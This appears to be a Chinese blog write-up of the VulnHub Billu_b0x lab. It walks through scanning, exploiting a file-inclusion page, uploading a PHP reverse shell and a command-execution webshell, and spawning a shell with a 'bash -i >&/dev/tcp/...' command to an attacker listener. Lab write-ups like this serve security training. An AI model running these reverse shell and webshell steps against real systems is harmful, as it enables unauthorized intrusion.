渗透测试billu_x0

最新推荐文章于 2024-08-06 21:02:21 发布
最新推荐文章于 2024-08-06 21:02:21 发布
阅读量144 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46164380/article/details/104729883
版权

靶机下载链接:https://download.vulnhub.com/billu/
1.查询网段
nmap -sP 192.168.47.1/24
2.查询详细服务
nmap -O -sV 192.168.47.164
3.查看80页面

4.dirb目录扫描;查看备份文件

dirb http://192.168.47.164

dirb http://192.168.47.164 -X .bak

5.应为是php编写的,所以扫描一下.php后缀的文件

dirb http://192.168.47.164 -X .php

6.dirbbuster字典扫描


7.有用信息

8.test是一个文件包含页面;而且是post提交

9.利用包含页面查看源码 c.php
有数据库连接地址,密码、用户、数据库名

登录mysql,里面有一个用户

尝试登录;登录成工里面有一个上传页面,和一个查看图片的页面


这是个php反弹shell;修改了图片特征码

上传成功

http://192.168.47.164/panel.php有一个文件包含漏洞
load参数=add/show;或者<>都会执行include函数

利用文件包含调用代码;kali建立监听,拿取shell

提权:查看版本号:

cat /etc/issue

第二种方法:

使用nc监听
上传一句话命令执行代码

可以执行命令漏洞


burp抓包执行nc反弹语句
echo “bash -i >&/dev/tcp/192.168.47.167/4444 0>&1” |bash 要进行url编码


反弹shell成功

sql注入:

weixin_46164380
关注
专栏目录
Billu_b0x的渗透测试
Cper的博客
10-26 595
靶场的测试实践和不同思路
靶机实战(billu)
weixin_45605313的博客
06-01 647
billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机billu 测试机:kali,win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
Vulnhub靶机 Billu_b0x(渗透测试详解)
最新发布
2301_78721909的博客
08-06 401
Vulnhub靶机 Billu_b0x(渗透测试
Billu_b0x靶场渗透测试
qq_41567985的博客
11-05 172
总结一下今天的打靶,这个靶场有很多漏洞可以利用,但是我也只是利用了一两个,中间反弹shell那里花了挺多时间的,但是也有提升,让我学到了很多种反弹shell的方法!使用了很多提权命令都不是很行,也在里面使用了wget发现还是不行,后面才查到没有权限需要去/tmp目录下。确实啊,tmp目录本来就容易被忽视,777的权限,这个应该要好好的完善一下权限才行。把限免load改成上传的php文件改成jpg文件之后的名字-send-并且反弹成功。始终反弹不成功,按照网上的方法也都试了试,还是不成功,不是很明白。
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3953
CTF综合靶场渗透系列-Billu_b0x
靶机渗透【billu_b0x】
学信安技术 卫国家之门
01-10 7502
文章目录*一. billu_b0x 靶机安装*1. 靶机下载2. 开启靶机*二. billu_b0x 靶机渗透*1. 信息收集2. Web渗透3. 反弹shell4. 提权 一. billu_b0x 靶机安装 1. 靶机下载 百度网盘链接提取码 billu_b0x.rar 提取码:8whr 2. 开启靶机 打开 VMware,在左上角选择 - - 文件 - - 打开 找到 billu_b0x 靶机解压位置 开启后如图所示 二. billu_b0x 靶机渗透 开启一台 Kali
靶机渗透(二)——Billu_b0x
qq_45751902的博客
04-18 2033
一、环境配置 kali:192.168.92.5 nat模式 靶机:192.168.92.3 nat模式 二、信息收集 1.扫描ip nmap -sP 192.168.92.0/24 2.端口扫描 半开扫描:nmap -sS 192.168.92.3 全开扫描:nmap -sT 192.168.92.3 3个过程全部完成叫全开扫描,最后一步不做,叫半开扫描。在实际过程中,半开扫描应用的最多,半开扫描不容易被目标电脑日志记录。 3.目录扫描 dirb http://192.168.92.3
海贼王渗透靶场 Vulnhub:Billu_Box
qq_47168481的博客
09-26 725
海贼王渗透靶场
VulnHub渗透测试实战靶场 - Billu_b0x
LYJ20010728的博客
08-04 2186
VulnHub渗透测试实战靶场 - Billu_b0x环境下载Billu_b0x靶机搭建渗透测试信息搜集漏洞挖掘getshell获得root权限获得非root权限提权 环境下载 戳此进行环境下载 Billu_b0x靶机搭建 将下载好的靶机环境,用VMware导入,将靶机和攻击机的网络连接设置为NAT模式 渗透测试 信息搜集 用Kali中的arp扫描探测一下:sudo arp-scan -l 使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP
billu_b0x靶场通关
tpaer的博客
03-03 760
billu_box靶场通关
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 420
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
Billu_box渗透测试
Darklord.W
04-11 830
Billu_box渗透测试 0x00实验环境 靶机Billu_boxIP地址:192.168.8.207 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan 及nmap扫描 进入web界面 首先,扫描web目录: 得到:...
靶场渗透(一)——billu_b0x渗透
Ramona的博客
07-29 1127
测试环境 靶机billu_b0x 打开虚拟机后设为nat模式 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22...
cmd下解析域名
热门推荐
weixin_46164380的博客
05-10 1万+
1.进入cmd windows+r 2.nslookup 输入域名www.baidu.com
蜜罐-mysql任意读取文件
weixin_46164380的博客
03-31 1947
mysql任意读取攻击者的文件 下载源码:https://github.com/allyshka/Rogue-MySql-Server 1.解压:unzip Rogue-MySql-Server-master.zip Ps:没开启蜜罐时的端口。 这是开启蜜罐后的端口 2.直接使用python执行 3.运行之后会生成一个.log文件,里面会显示读取到的内容 4.再次运行python脚...
Nessus v8.9.1无限ip扫描
weixin_46164380的博客
11-21 1294
本篇文章为转载 注:本次测试系统为Windows10 X64版本 0x1:安装Nessus 直接到 Nessus 官网:https://www.tenable.com/downloads/nessus 下载对应系统版本的 Nessus,基本上主流平台都有。下载好后打开进行安装即可。 Nessus会自动打开浏览器,询问是否使用SSL,选择是,如果浏览器提示证书问题,请忽略或添加白名单,一般默认地址是:https://localhost:8834/,到这里初始化后就开始选择安装了, 1.1需要注意第一步选择 M
wpscan无法更新和更新时报错
weixin_46164380的博客
03-28 962
用dpkg -L wpscan |grep update,找到wpscan的更新配置文件 修改配置文件中的更新地址 vim /usr/share/rubygems-integration/all/gems/wpscan-3.7.6/lib/wpscan/db/updater.rb 注释掉原来的跟新地址:# “https://data.wpscan.org/#{filename}” 修...
C段?旁站?
weixin_46164380的博客
12-24 579
C段 C段是指与目标服务器同网段的服务器 工具 nmap 旁站 旁站是指在目标服务器上的不同网站 在线工具 http://www.webscan.cc/ http://www.5kik.com/c/
入门靶场Billu_b0x:Web渗透学习与实践
"Billu_b0x靶机练习是一个适合初学者的Web渗透入门实践,旨在帮助用户了解基本的Web渗透流程。通过该靶场,用户可以锻炼自己的技能,包括主机发现、端口扫描和信息收集等。文章作者作为小白,分享了其学习过程中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值